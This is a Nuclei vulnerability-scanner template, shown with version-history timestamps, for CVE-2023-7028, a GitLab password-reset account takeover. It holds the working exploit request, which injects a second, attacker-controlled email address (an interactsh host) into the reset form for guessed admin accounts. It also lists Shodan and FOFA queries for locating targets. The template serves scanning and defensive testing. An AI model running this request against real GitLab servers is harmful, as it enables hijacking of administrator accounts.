nuclei-templates/http/cves/2023/CVE-2023-7028.yaml

79 lines
2.5 KiB
YAML
Raw Normal View History

2024-01-14 07:28:32 +00:00
id: CVE-2023-7028
info:
2024-01-14 12:16:26 +00:00
name: GitLab - Account Takeover via Password Reset
2024-01-14 07:28:32 +00:00
author: DhiyaneshDk,rootxharsh,iamnooob,pdresearch
2024-05-31 19:23:20 +00:00
severity: high
2024-01-14 07:28:32 +00:00
description: |
An issue has been discovered in GitLab CE/EE affecting all versions from 16.1 prior to 16.1.6, 16.2 prior to 16.2.9, 16.3 prior to 16.3.7, 16.4 prior to 16.4.5, 16.5 prior to 16.5.6, 16.6 prior to 16.6.4, and 16.7 prior to 16.7.2 in which user account password reset emails could be delivered to an unverified email address.
reference:
- https://about.gitlab.com/releases/2024/01/11/critical-security-release-gitlab-16-7-2-released/
- https://x.com/rwincey/status/1745659710089437368?s=20
2024-01-14 12:16:26 +00:00
- https://gitlab.com/gitlab-org/gitlab/-/issues/436084
- https://hackerone.com/reports/2293343
2024-05-31 19:23:20 +00:00
- https://github.com/V1lu0/CVE-2023-7028
2024-01-14 12:16:26 +00:00
classification:
2024-05-31 19:23:20 +00:00
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
2024-01-14 12:16:26 +00:00
cve-id: CVE-2023-7028
2024-05-31 19:23:20 +00:00
cwe-id: CWE-640,CWE-284
epss-score: 0.95952
epss-percentile: 0.99464
cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*
2024-01-14 07:28:32 +00:00
metadata:
verified: true
max-request: 6
2024-01-14 07:28:32 +00:00
vendor: gitlab
product: gitlab
shodan-query:
- title:"Gitlab"
- cpe:"cpe:2.3:a:gitlab:gitlab"
- http.title:"gitlab"
2024-05-31 19:23:20 +00:00
fofa-query: title="gitlab"
google-query: intitle:"gitlab"
tags: hackerone,cve,cve2023,gitlab,auth-bypass,intrusive,kev
2024-01-26 12:39:32 +00:00
flow: http(1) && http(2)
2024-01-16 07:42:46 +00:00
2024-01-14 07:28:32 +00:00
http:
- raw:
- |
GET /users/sign_in HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
name: token
group: 1
regex:
- name="authenticity_token" value="([A-Za-z0-9_-]+)"
internal: true
- raw:
- |
2024-01-14 12:16:26 +00:00
@timeout: 20s
2024-01-14 07:28:32 +00:00
POST /users/password HTTP/1.1
Host: {{Hostname}}
Origin: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
Referer: {{RootURL}}/users/password/new
2024-01-14 12:16:26 +00:00
authenticity_token={{token}}&user[email][]={{username}}&user[email][]={{rand_base(6)}}@{{interactsh-url}}
2024-01-14 07:28:32 +00:00
payloads:
username:
2024-01-14 12:16:26 +00:00
- admin@example.com
- admin@{{RDN}}
- root@{{RDN}}
- gitlab@{{RDN}}
- git@{{RDN}}
2024-01-14 07:28:32 +00:00
matchers:
- type: dsl
dsl:
2024-01-14 12:16:26 +00:00
- contains(interactsh_protocol, 'smtp')
extractors:
- type: dsl
dsl:
- username
# digest: 4a0a00473045022100fe706da29f53fa0b108713ef9f95c38b54a7481e7a91e1935b4a61b053972c320220348984153c3fabb194fc8d66770c796b3a32a7ebfd8f0a20d8eaf3b529aa2c84:922c64590222798bb761d5b6d8e72950